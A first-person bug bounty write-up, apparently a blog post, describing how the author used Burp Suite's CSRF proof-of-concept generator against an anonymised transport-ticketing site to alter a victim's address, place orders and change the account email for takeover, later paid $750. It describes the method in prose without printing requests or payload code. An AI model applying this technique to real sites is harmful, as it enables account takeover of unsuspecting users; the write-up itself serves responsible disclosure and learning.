My First CSRF to Account Takeover worth $750

Before I start. I want to take a moment to all who helped me learn Web Application Security and Bug Bounty Hunting! :)

Hello, Guys, the Program was a private Invite and I am still working with this program. So, for the sake of the privacy of the program, let us call it “example.com” in this writeup.

I got this invite around 6 months back. The Website has the functionality of making an order of using public transport ( e.g. Purchasing tickets, passes, storing user information like card details, home address, work address, etc.).

To test the CSRF, I created two accounts. One for the attacker and another for the Victim. Let us call it as “Attacker@gmail.com” and “victim@gmail.com”.

“attacker@gmail.com”

Now, I filled in the details for both the account. And then I started making some changes into it like adding work address and making an order from the Attacker’s account. I Put the Burp Intercept ON and clicked on the “save” button. Here is the burp request which I captured.

Now, I generated the CSRF poc using the burp suite and saved it as an html page. And send it to the victim account who was logged in using the Chrome browser. I opened the HTML page in the new tab of the Chrome browser and refreshed the page where I was already logged in. And Boom….. The work address of the victim was changed to “bla….bla…bla” and a new order was made on behalf of the victim. As the card details were not added in both the accounts, the order was eligible for on-spot payment.

Now…I thought that if the attacker is able to make order on behlaf of the victim then he could probably also takeover the victim’s account. I said to let’s check it out.. :)

Now to take over the account, I went to the setting page of the attacker's account first and then gave a temporary email address from the temp-mail.ord and captured the request in Burp without any changes by re-saving the same information. Then I saved the CSRF POC and sent it to the victim. As soon as I opened the page in the victim’s browser the email of the account changed from “victim@gmail.com” to the temp-mail one. Then I was like….

Finally, I made a nice report and submitted it to the program. The Company took almost 3 months to respond and closed the report by paying $750 in the next 1 month. Although it was less for the account takeover ;).

I thought of putting this writeup a million times but I am Lazy! Lol! :P

Thanks for being patient and reading this writeup. This is my first ever writeup. I hope you all like it and let me know if you want me to put anything else in my next writeup or any mistakes in this writeup.

You can always find me on:
Twitter: https://twitter.com/inishantsinha
LinkedIn: https://www.linkedin.com/in/nishantsaurav/

:) :)